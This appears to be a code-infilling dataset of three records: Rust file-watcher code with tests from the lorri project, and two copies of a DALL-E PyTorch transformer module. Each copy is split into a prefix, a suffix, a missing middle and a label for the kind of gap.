/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn ex | ath: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will uconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious annd they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now to go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound of watcher (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racey in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files in to place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topolocially sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
}
| tend_filter(p | identifier_name |
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
Reconstructs the full sequence before the layer and
cuts the suffix of the outputs after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs)
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
optimize_for_inference = False, # use cache-friendly masked attention instead of sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
|
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.)) # text is given a position of -10 apart from the image axial positions, which is from range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask
| attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable) | conditional_block |
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
Reconstructs the full sequence before the layer and
cuts the suffix of the outputs after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs)
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
|
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
optimize_for_inference = False, # use cache-friendly masked attention instead of sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable)
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.)) # text is given a position of -10 apart from the image axial positions, which is from range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask
| def __init__(self, dim, depth, fn):
